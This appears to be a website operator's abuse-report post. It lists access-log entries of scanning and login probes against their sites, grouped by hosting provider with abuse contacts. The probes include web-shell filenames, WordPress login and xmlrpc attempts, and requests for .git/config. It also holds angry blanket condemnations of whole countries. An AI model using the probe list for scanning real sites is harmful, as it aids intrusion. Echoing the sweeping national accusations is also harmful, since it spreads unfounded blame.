185.39.19.43 website*x.com – – [17/Oct/2025:23:20:21 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
185.39.19.43 website*x.com – – [17/Oct/2025:23:20:21 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
185.39.19.43 website*x.com – – [17/Oct/2025:23:20:21 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0“
+
185.39.19.49 website*x.com – – [18/Oct/2025:15:17:26 +0200] „GET / HTTP/1.0“ 403 – „https://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
185.39.19.49 website*x.com – – [18/Oct/2025:15:17:27 +0200] „GET / HTTP/1.0“ 403 – „https://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
+
185.39.19.34 website*x.com – – [19/Oct/2025:15:13:47 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [19/Oct/2025:15:13:47 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [19/Oct/2025:15:13:48 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
185.39.19.34 website*x.com – – [19/Oct/2025:15:13:48 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

AS8075 – Microsoft Corporation – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
13.86.90.41 website*x.com – – [18/Oct/2025:02:52:28 +0200] „GET /aa.php HTTP/1.0“ 403 – „-“ „-“
13.86.90.41 website*x.com – – [18/Oct/2025:02:52:28 +0200] „GET /abcd.php HTTP/1.0“ 403 – „-“ „-“
13.86.90.41 website*x.com – – [18/Oct/2025:02:52:28 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“

AS34984 – Superonline Iletisim Hizmetleri A.S. – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
88.214.41.16 website*x.com – – [18/Oct/2025:03:48:23 +0200] „GET /wso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
88.214.41.16 website*x.com – – [18/Oct/2025:03:48:23 +0200] „GET /shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
88.214.41.16 website*x.com – – [18/Oct/2025:03:48:23 +0200] „GET /xleet-shell.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
88.214.41.16 website*x.com – – [18/Oct/2025:03:48:23 +0200] „GET /xleet.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
88.214.41.16 website*x.com – – [18/Oct/2025:03:48:23 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 3 – WEEKEND!

hm-changed@vnnic.vn,huypt@vnpt.vn,noc@rosfon.com,abuse@as210558.net

AS45899 – VNPT Corp – VERY UNSECURE AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VIETNAM IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
HERE WITH 2 IP´S!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
123.18.209.134 website*x.com – – [18/Oct/2025:04:35:23 +0200] „POST /bridge2cart/bridge.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“
+
14.167.54.226 website*x.com – – [18/Oct/2025:09:11:09 +0200] „GET /le_connector/connector.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“

AS201825 – LLC ER-Telecom Moscow – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
217.15.56.233 website*x.com – – [18/Oct/2025:05:10:17 +0200] „GET /wp-content/plugins/suretriggers/assets/images/STLogo.svg HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
217.15.56.233 website*x.com – – [18/Oct/2025:05:10:17 +0200] „GET /wp-json/sure-triggers/v1/ HTTP/1.0“ 404 144 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“

AS210558 – 1337 Services GmbH – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE WEEKS AND THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
84.54.33.23 website*x.com – – [18/Oct/2025:10:35:26 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

ABUSE-MAIL NR. 4 – WEEKEND!

abuse@amazonaws.com, trustandsafety@support.aws.com,olatunji822@outlook.com,anti-spam@chinatelecom.cn,ipreport.sd@chinatelecom.cn

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
2406:da18:baf:9b00:bf26:9189:4e4a:c152 www.website*x.de – – [19/Oct/2025:13:47:49 +0200] „GET /file-manager/initialize HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“
2406:da18:baf:9b00:bf26:9189:4e4a:c152 www.website*x.de – – [19/Oct/2025:13:47:50 +0200] „GET /register HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“
2406:da18:baf:9b00:bf26:9189:4e4a:c152 www.website*x.de – – [19/Oct/2025:13:48:08 +0200] „GET /login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“
2406:da18:baf:9b00:bf26:9189:4e4a:c152 www.website*x.de – – [19/Oct/2025:13:48:10 +0200] „GET /admin/login HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“
2406:da18:baf:9b00:bf26:9189:4e4a:c152 www.website*x.de – – [19/Oct/2025:13:48:11 +0200] „GET /admin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0“

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD – VERY UNSECURE AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE WEEKS AND THIS VERY UNSECURE PROVIDER DOES NOTHING!!!
62.60.130.228 www.website*x.de – – [17/Oct/2025:18:58:22 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.130 Safari/537.36“
62.60.130.228 www.website*x.de – – [17/Oct/2025:18:58:32 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/122.0“
62.60.130.228 www.website*x.de – – [17/Oct/2025:18:58:32 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
+
62.60.130.210 www.website*x.de – – [19/Oct/2025:13:10:07 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
62.60.130.210 www.website*x.de – – [19/Oct/2025:13:10:18 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
62.60.130.210 www.website*x.de – – [19/Oct/2025:13:10:18 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“

AS4134 – CHINANET-BACKBONE – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
CHINA IS COMPLETE VERY UNWANTEDAND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE WE HAVE A 403 BUT WHEN IT´S A 200, THIS IDIOTS START TO TRY TO HACKING!
182.42.111.213 www.website*x.de – – [19/Oct/2025:02:59:53 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

ABUSE-MAIL NR. 5 – WEEKEND!

abuse@datacamp.co.uk,abuse@cheapy.host

AS212238 – Datacamp Limited – VERY UNSECURE! – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONLY 1 AUTOMATIC ANSWER! – STOP THIS NOW AND NOT IN LATEST 48 HOURS!!!
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:25 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:25 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:25 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:26 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:26 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:26 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:26 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:26 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:27 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:28 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:28 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:28 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:28 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
169.150.203.197 website*x.de – – [17/Oct/2025:17:51:28 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

ABUSE-MAIL NR. 6 – WEEKEND!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,protect@bt.com,info@galeonllc.ru

AS8075 – Microsoft Corporation – VERY UNSECURE AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
40.86.42.83 website*x.com – – [17/Oct/2025:18:13:38 +0200] „GET /WSO.php HTTP/1.0“ 403 – „-“ „-“
40.86.42.83 website*x.com – – [17/Oct/2025:18:13:38 +0200] „GET /a.php HTTP/1.0“ 302 – „-“ „-“

AS2856 – British Telecommunications PLC – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLACK ALSO ISP WITH HACKER-IDIOTS!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2a00:23c7:8296:9201:e4c3:8f2d:de76:379d website*x.com – – [18/Oct/2025:05:36:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS50340 – JSC Selectel – VERY IGNORANt AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS COMPLETE VERY UNWANTED! – TO MANY HACKER-IDIOTS EVERY DAY!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
Here are we have a 403 but when it´s a 200, this idiots start to try to hacking!
45.89.70.30 website*x.com – – [18/Oct/2025:13:46:30 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 website*x.com – – [18/Oct/2025:13:46:30 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 website*x.com – – [18/Oct/2025:13:46:30 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“
45.89.70.30 website*x.com – – [18/Oct/2025:13:46:30 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 7 – WEEKEND!

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@hostinghome.in,abuse-team@tier.net

AS149545 – Hosting Home – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.185.75.197 www.website*x.com – – [17/Oct/2025:18:32:32 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)“
103.185.75.197 www.website*x.com – – [17/Oct/2025:18:32:33 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com/wp-login.php“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)“

AS16509 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
43.203.163.65 website*x.com – – [17/Oct/2025:18:43:37 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ELinks/0.12~pre5-4“

AS397423 – Tier.Net Technologies LLC. – VERY GOOD PROVIDER! – ALWAYS STOPS THE HACKER-IDIOTS AFTER ABUSE-MAIL FROM US!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD!
147.124.197.101 www.website*x.com – – [17/Oct/2025:18:44:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)“
147.124.197.101 www.website*x.com – – [17/Oct/2025:18:44:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com/wp-login.php“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)“

ABUSE-MAIL NR. 8 – WEEKEND!

abuse-reports@cloudzy.com,abuse@vdsina.com,abuse@rt.ru

AS14956 – RouterHosting LLC – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:33:57 +0200] „GET /wp-admin/js/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:34:37 +0200] „GET /wp-admin/images/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:35:06 +0200] „GET /wp-admin/css/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:35:43 +0200] „GET /wp-includes/SimplePie/Content/Type/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:36:00 +0200] „GET /wp-includes/Requests/Auth/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:36:16 +0200] „GET /wp-admin/css/colors/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:37:09 +0200] „GET /wp-content/languages/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:37:44 +0200] „GET /wp-content/upgrade/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:02 +0200] „GET /wp-content/IXR/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:19 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:22 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:22 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:25 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:26 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:3:6de::1 website*x.com – – [17/Oct/2025:20:38:28 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS216071 – SERVERS TECH FZCO – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!
DAILY REFFERER-SPAM AND THIS PROVIDER DOES NOTHING!!!
VDSINA IS VERY UNWANTED AND COMPLETE BLOCKED!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
